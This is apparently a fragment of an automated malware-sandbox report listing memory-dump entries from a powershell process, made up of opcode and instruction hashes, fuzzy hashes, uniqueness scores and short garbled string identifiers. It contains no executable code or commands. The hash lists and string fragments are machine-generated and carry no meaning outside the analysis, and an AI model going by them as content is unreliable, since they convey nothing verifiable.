                                                  • Instruction Fuzzy Hash: 8E3292B8B00614CFD724DB64C951FAAB7B2AF89304F108499D94A6B351CB31ED82CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$4'jq$4Il$tL>k$x.=k
                                                  • API String ID: 0-3398603070
                                                  • Opcode ID: 56beedaf9418bf2a71e2fe261f400bfdd8c1936a817e5c857d6a50aebcfbe0ff
                                                  • Instruction ID: b802c821f6e715b6a41bcb8c7fedc3384400048731a1c2559a9d5c675750c14e
                                                  • Opcode Fuzzy Hash: 56beedaf9418bf2a71e2fe261f400bfdd8c1936a817e5c857d6a50aebcfbe0ff
                                                  • Instruction Fuzzy Hash: 2B122CB4B00615CFEB60CB64C951FAAB7B6EF45308F108499E54AAB391CB71ED81CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$4'jq$4Il$tL>k$x.=k
                                                  • API String ID: 0-3398603070
                                                  • Opcode ID: c4089fd95e5a9f9ae946f20ccc427912834049308448c398426733839b8bac7e
                                                  • Instruction ID: 6b3afd7d7406d6002058c66f8b2143d5b1f5bcfd13e68125eebbbbd5988f809a
                                                  • Opcode Fuzzy Hash: c4089fd95e5a9f9ae946f20ccc427912834049308448c398426733839b8bac7e
                                                  • Instruction Fuzzy Hash: E9122CB4B00615CFEB64CB64C991FAAB7B6EF45308F108499E509AB391CB71ED81CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8Nj$Hnq$h]j$h]j$h]j$$jq$$jq$Ij
                                                  • API String ID: 0-3888825856
                                                  • Opcode ID: c49f0a83587d09f3839809f5e56a60cd560cefbc86e484cf078bbc2644d8da01
                                                  • Instruction ID: 9c3f2362bf3a69ad1957ef98d40b1a545054ba62173f4a43a8a87469fad51cbb
                                                  • Opcode Fuzzy Hash: c49f0a83587d09f3839809f5e56a60cd560cefbc86e484cf078bbc2644d8da01
                                                  • Instruction Fuzzy Hash: 1E227330B012188FDB26EF25D854BAEB7B6BF89305F1444A9D90AAB351DF35AD41CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$4'jq$4'jq$4'jq$4'jq$x.=k$-=k
                                                  • API String ID: 0-4231063173
                                                  • Opcode ID: 576799bd708b66b0bd7a0c9ab3ea9d26b5c09cc25b81bd001b38804a31939f18
                                                  • Instruction ID: 9922bbc7dbf5478310b1015988da9b9ae1aaf8cc2b048cb48eb61be785442fc5
                                                  • Opcode Fuzzy Hash: 576799bd708b66b0bd7a0c9ab3ea9d26b5c09cc25b81bd001b38804a31939f18
                                                  • Instruction Fuzzy Hash: 43E18F78B402058FD714DBA8C551FAEBBA7AF88308F11C469D9016F365CB75EC46CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                  • API String ID: 0-103809679
                                                  • Opcode ID: 1de6c082ce638ec9107ff9ee8c87c8c0b573023ed9881d71ab943ad3bf911d7a
                                                  • Instruction ID: 66492fa5faa303cd658ed7b45f5d3c6a2a3d76df1a37c9045c3f7a1351dffdad
                                                  • Opcode Fuzzy Hash: 1de6c082ce638ec9107ff9ee8c87c8c0b573023ed9881d71ab943ad3bf911d7a
                                                  • Instruction Fuzzy Hash: B41237B57042068FDB148B6C9850B7ABBEBEFC5218F18C47AD819CB392DA35CC41C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$4'jq$4'jq$x.=k$-=k
                                                  • API String ID: 0-1898245147
                                                  • Opcode ID: 4c13d1f66f7de9980bdf6bb03999ee0b7c25fcca8fb99c909dc0a17bc7e86249
                                                  • Instruction ID: 2bc8474a6a0adf62e4221deec8746fe8a6f0a64babaca6ea974598e2c469b9bb
                                                  • Opcode Fuzzy Hash: 4c13d1f66f7de9980bdf6bb03999ee0b7c25fcca8fb99c909dc0a17bc7e86249
                                                  • Instruction Fuzzy Hash: 6BC19EB8B402058FDB14DBA8C541FAEBBB6AF88308F16C459D8046F355CB75EC46CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl
                                                  • API String ID: 0-812440056
                                                  • Opcode ID: f0a6559fb4dbcf3188efe19b8ecdd96f4940657501277743100706eca80e1dc1
                                                  • Instruction ID: 8daea38a908d656571a7416a21cb891ac082a8efbb78c8445eea4f960cf9c16d
                                                  • Opcode Fuzzy Hash: f0a6559fb4dbcf3188efe19b8ecdd96f4940657501277743100706eca80e1dc1
                                                  • Instruction Fuzzy Hash: 62028C74B406098FD714CB98C550EAABBF6EF89309F15C469D805AF365CB72EC42CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl
                                                  • API String ID: 0-812440056
                                                  • Opcode ID: eb98c13b54454fa93be48a781b325e6255e29f7e9fe88b5177d547037dbfb869
                                                  • Instruction ID: 20833cb31b66abb177599ddf956b6cc3385e521481e13b38c74212e121191a31
                                                  • Opcode Fuzzy Hash: eb98c13b54454fa93be48a781b325e6255e29f7e9fe88b5177d547037dbfb869
                                                  • Instruction Fuzzy Hash: 46124CB4B00245DFD714CB98C581E6ABBB6FF84718F16C459E905AB361CB72EC42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$h2?k
                                                  • API String ID: 0-1522251839
                                                  • Opcode ID: c058a07bdbb58fe2d8eff164abfe5de24d0372b049398314c2dba8a768275486
                                                  • Instruction ID: 4e0ccc7711f9e78134791fce88e65f3da1a5ab59526e9f1003683aa741dd7d6e
                                                  • Opcode Fuzzy Hash: c058a07bdbb58fe2d8eff164abfe5de24d0372b049398314c2dba8a768275486
                                                  • Instruction Fuzzy Hash: 43028DB4B40209DFDB14CB58C580EA9BBB6EF89309F15C469E905AF365C772EC42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: h]j$Ij
                                                  • API String ID: 0-195636185
                                                  • Opcode ID: 73054589b3d77722bd0e7749e5c1e9980e80524e3a450b994c3a5cdeda8fd4ac
                                                  • Instruction ID: ef07ab5505576d70d1471d7c618217b10b1d26401221b7e8937341ebb8fd4399
                                                  • Opcode Fuzzy Hash: 73054589b3d77722bd0e7749e5c1e9980e80524e3a450b994c3a5cdeda8fd4ac
                                                  • Instruction Fuzzy Hash: 7B315430B011288FCB26DB64C8556EEB7B2BF89305F2444E9D51AAB351DF35AE41CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $jq$$jq
                                                  • API String ID: 0-3720491408
                                                  • Opcode ID: b21630dabd199d549ddb7dfacadb19f04edb0fcd0661fcde05ff1a0de5bbd400
                                                  • Instruction ID: cda15e4d626cc67578202f698e2574f7dee0e6d796537327cf887a533091aa79
                                                  • Opcode Fuzzy Hash: b21630dabd199d549ddb7dfacadb19f04edb0fcd0661fcde05ff1a0de5bbd400
                                                  • Instruction Fuzzy Hash: 7F11B6B56002069FD7248E0DC850A7AB7ABFFC1329F29C569EC1D9B251C776DC41C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl
                                                  • API String ID: 0-273728037
                                                  • Opcode ID: 1d5a79d73856911bdfce86e17444b55e5b0323ecc061b6f52677d63e8e2b89d1
                                                  • Instruction ID: 6a789dcc6b447fd065d950b0200a6d754d796f17facf88e4daa8e402cdbecec5
                                                  • Opcode Fuzzy Hash: 1d5a79d73856911bdfce86e17444b55e5b0323ecc061b6f52677d63e8e2b89d1
                                                  • Instruction Fuzzy Hash: 4F222BB4B01245DFD714CB98C581E6ABBB6FF84718F16C069E905AB365CB72EC42CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl
                                                  • API String ID: 0-273728037
                                                  • Opcode ID: 1d07f4ab0ed73dc1882c80fe9da3b235e1775e68d7d205277ef8995470a8304b
                                                  • Instruction ID: 9a67ba7a8ae569095b77d4ca98153e447296fc5525356532ecbaafc62c984304
                                                  • Opcode Fuzzy Hash: 1d07f4ab0ed73dc1882c80fe9da3b235e1775e68d7d205277ef8995470a8304b
                                                  • Instruction Fuzzy Hash: AAF15CB4A40609CFDB14CB98C580EA9BBF6FF89319F15C099D815AB365C772EC42CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Vj
                                                  • API String ID: 0-3251626932
                                                  • Opcode ID: b36dacd0dd240e87e2ea62f3b2bf4774757670a9b2dfe2614fe5bd57404f9d80
                                                  • Instruction ID: 9bdcfb167eb6c9c40701941d8db992ae21340d0321c32dcb5a87fcd2d54432af
                                                  • Opcode Fuzzy Hash: b36dacd0dd240e87e2ea62f3b2bf4774757670a9b2dfe2614fe5bd57404f9d80
                                                  • Instruction Fuzzy Hash: 12B15E70E00209EFDF11CFAAD885BADBBF5BF48314F24853AD414A7258EB75A845CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x.=k
                                                  • API String ID: 0-227855595
                                                  • Opcode ID: c43acf636945113622e7d18d516fd7a615428a12cac8220e3943e71d0f49108d
                                                  • Instruction ID: e8e13ae36eb77cab30fc58739e4ef51a907ed822e59e4ee5fa4d18537c68706e
                                                  • Opcode Fuzzy Hash: c43acf636945113622e7d18d516fd7a615428a12cac8220e3943e71d0f49108d
                                                  • Instruction Fuzzy Hash: 4331E7787801049BE304A778CA51FAF7AA7DF84308F118428E9016F395CF76AC46CBE2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e05816fd0bcd5b67b09423a75cad23185ae95cf6111312ee90f6c83755605c42
                                                  • Instruction ID: 9626ecc3757a37552101126adfa6db573d1ea3e39240e373010bfba443dd13cd
                                                  • Opcode Fuzzy Hash: e05816fd0bcd5b67b09423a75cad23185ae95cf6111312ee90f6c83755605c42
                                                  • Instruction Fuzzy Hash: 59E12A74A00209DFDB15CF99D584AADBBB6FF88310F248569E815AB365C731FD82CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9647c9c2a4468b8787e73a4265749d6f6d72e060b764d8d5b8b83af8f9352448
                                                  • Instruction ID: 69c5da912fa70dd1a1296d73911c733aa82e8d94cc6aad4d45a21baf32bec165
                                                  • Opcode Fuzzy Hash: 9647c9c2a4468b8787e73a4265749d6f6d72e060b764d8d5b8b83af8f9352448
                                                  • Instruction Fuzzy Hash: 8FC1AD31A00208CFCB15DFE9D944AADBBB6FF84314F1185A9E8069B264DB35ED49CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edbe7426acd7708ceec79e7111a911b70fd6afd6bb81aab9c1a09c6d25b014ee
                                                  • Instruction ID: 5fc5ac2104fa56551db9f6f988189a5ca8539b7ce6a10368a00762abac4991db
                                                  • Opcode Fuzzy Hash: edbe7426acd7708ceec79e7111a911b70fd6afd6bb81aab9c1a09c6d25b014ee
                                                  • Instruction Fuzzy Hash: D0B19270E00209EFDF11CFAAC9817ADBBF5AF48314F24853AD459EB258E774A845CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6088b3a2bfdfaaabfa784f3cd7ca45ea1ff21b9013c5d73ead5d2b4f68ad47f3
                                                  • Instruction ID: 6a314adec1ea418112b2c390efcdc946bbeb27b09341a27ef9c53ceed8e60a99
                                                  • Opcode Fuzzy Hash: 6088b3a2bfdfaaabfa784f3cd7ca45ea1ff21b9013c5d73ead5d2b4f68ad47f3
                                                  • Instruction Fuzzy Hash: 51919D74A002059FCB06CF59C5949BEFBB5FF49310B2885A9D9159B3A5C731FC81CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3dfe8c1620f60f4de67b0219c170576d4358eb532f98d171598bd6d10b62dba3
                                                  • Instruction ID: 5e2fd4f88cc594e7199641536a67890b7979ceea789405059fb1b56f645ab0d3
                                                  • Opcode Fuzzy Hash: 3dfe8c1620f60f4de67b0219c170576d4358eb532f98d171598bd6d10b62dba3
                                                  • Instruction Fuzzy Hash: F071B230A00209DFCB15DFA9C884AADFBF6EF85354F1489BAD416DB261DB75AC06CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 930debcdbe6f90a33475f55f9a61ae18766b10a31bca0524a8e295da21ce8a76
                                                  • Instruction ID: e0776799bcf457c34021940983e005e228fa71bdd273837ebd56e210722b6e71
                                                  • Opcode Fuzzy Hash: 930debcdbe6f90a33475f55f9a61ae18766b10a31bca0524a8e295da21ce8a76
                                                  • Instruction Fuzzy Hash: A1716D30A00208DFDB15EFB5D880AADBBF6FF88304F148479D402AB2A4DB35AD46CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d3c09229ba7b8b470d82ad08f32b65c76cc63d619a7f4c5e79aa7e46d26c4a5
                                                  • Instruction ID: 1d6efa7f190eac56d3118a21c884c1c55f9ef3bc65948af84a3b5d575660ec2f
                                                  • Opcode Fuzzy Hash: 6d3c09229ba7b8b470d82ad08f32b65c76cc63d619a7f4c5e79aa7e46d26c4a5
                                                  • Instruction Fuzzy Hash: 4641AF356002109FDB15DB75C5586BA7BB7EF89350F0444B9D506EB7A0CB35AC41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a1713cee896782ff831d4940c09394ee0193537b393feadecb2959698d48aca6
                                                  • Instruction ID: 1cff47ad507c4cf918d42e93bd63587183f9cf735a959f52a3a0c7bd6e207a0f
                                                  • Opcode Fuzzy Hash: a1713cee896782ff831d4940c09394ee0193537b393feadecb2959698d48aca6
                                                  • Instruction Fuzzy Hash: 9A510A34A00209EFDB05CF98D584AADBBB6FF88314F248559E804AB365C735ED82CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fe9db366c22818dd782b24f1eaa307842520bca8dfb54427ac9fad704b99149a
                                                  • Instruction ID: 50a4aedc81292c698078529a08bb28cb9b5bba18fb8e823f2893cdbff36e07cb
                                                  • Opcode Fuzzy Hash: fe9db366c22818dd782b24f1eaa307842520bca8dfb54427ac9fad704b99149a
                                                  • Instruction Fuzzy Hash: 0841AC30A00218DFDB15DFB9C884AADBBB6FF88340F148879C406AB6A4DB75AC45CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38be9c142ba87033d1e991a0ac1437ec5ea7240dc237f99516e251990a9cd54d
                                                  • Instruction ID: 22db75f321c11c9f17bb232b4f5701e48adf6c0215f008c62db64d39f046a954
                                                  • Opcode Fuzzy Hash: 38be9c142ba87033d1e991a0ac1437ec5ea7240dc237f99516e251990a9cd54d
                                                  • Instruction Fuzzy Hash: 1A412674A00209DFCB06CF5AC1949BAFBB6FF48310B1585A9D905AB365C732FC91CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6cd6e93879e921f21c63524b4f92dde1b13cefe9fe55454c38fdb0199c82824b
                                                  • Instruction ID: 82d420da062f837cdb89829540b1bcdffb9772821a898cefeb78081d8843d2bb
                                                  • Opcode Fuzzy Hash: 6cd6e93879e921f21c63524b4f92dde1b13cefe9fe55454c38fdb0199c82824b
                                                  • Instruction Fuzzy Hash: E431E2F4B00206CFDB24CF6CC644B2AB7EBAF88618F1580A9D414DB261D731DD40CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 032fa2021792ca389512057be6c32d2f3f1a8fa3a4d4a0e5bfb30f27bb09aca0
                                                  • Instruction ID: 9f962d946d5568484c18b2d00bf98d276c9b3bcbe1dd9df88886e57fffe0f494
                                                  • Opcode Fuzzy Hash: 032fa2021792ca389512057be6c32d2f3f1a8fa3a4d4a0e5bfb30f27bb09aca0
                                                  • Instruction Fuzzy Hash: AA21B87478030A5BFB205A7A8844B37B6DB9FC4718F20883AD406CB3E0ED72C841C361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7774eb067d83c4a4422972711a366ccaef63c7a3dd3449e05762a964ac251614
                                                  • Instruction ID: 7c041829a273f45b848adfaee852d5cf39ac4efecaa58d5350bdca0572f1c4cf
                                                  • Opcode Fuzzy Hash: 7774eb067d83c4a4422972711a366ccaef63c7a3dd3449e05762a964ac251614
                                                  • Instruction Fuzzy Hash: C9312974A006059FCB15CF99C9849AEFBB1FF49310B2586A9D419AB362C731EC81CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f14ddead88de636fec0a63c467a1e581dcd50f3a6fb6cda81c049b3c00eeb596
                                                  • Instruction ID: 4ef1d13daa9850d9287406d830fee561d899c43f40d666ff15815bbb6bd657eb
                                                  • Opcode Fuzzy Hash: f14ddead88de636fec0a63c467a1e581dcd50f3a6fb6cda81c049b3c00eeb596
                                                  • Instruction Fuzzy Hash: E521F0B078874A5BFB200A7A8984B323FE79FD1308F18846AD544DF2E9E939D8418331
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad54f4bd8cb7b60c20ff23ec99a5cf8cf6a2bf849e535314052504c1895835f0
                                                  • Instruction ID: 271009a5250e95de0ef7e71e30a6166fbf1c888ed330dd8ddfd1ede95c281027
                                                  • Opcode Fuzzy Hash: ad54f4bd8cb7b60c20ff23ec99a5cf8cf6a2bf849e535314052504c1895835f0
                                                  • Instruction Fuzzy Hash: B4214170A00605DFCB16CF5DC598AB9FBB1FF49310B2586ADD4599B261C732EC42CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2083625acfebdd83b033b1982e28e1632d2c4e5232eedcebe7326c56f163377b
                                                  • Instruction ID: 8ae9440b0784454e54c5df4ef684c3946f40ed0e8db9b9dc1b800ec968d42f8b
                                                  • Opcode Fuzzy Hash: 2083625acfebdd83b033b1982e28e1632d2c4e5232eedcebe7326c56f163377b
                                                  • Instruction Fuzzy Hash: 6711D0B53102019BEF148E18C5C1B3AB77BEB8066CF18C0A5E9098F2A5DB76DD41C761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55e110d204aecf65f03df5c4c74ec4d24201dfaba34130e06e542813fa1d5d7a
                                                  • Instruction ID: 1c2d36ff439d56351140e28694551c5a1732a6d8ff81e9f7c62f6c918a9908fa
                                                  • Opcode Fuzzy Hash: 55e110d204aecf65f03df5c4c74ec4d24201dfaba34130e06e542813fa1d5d7a
                                                  • Instruction Fuzzy Hash: 0F1101B53102019BDF148E08C5C1F3AB7BBEB8066CF58C065E9098F2A5DB76DD41C761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
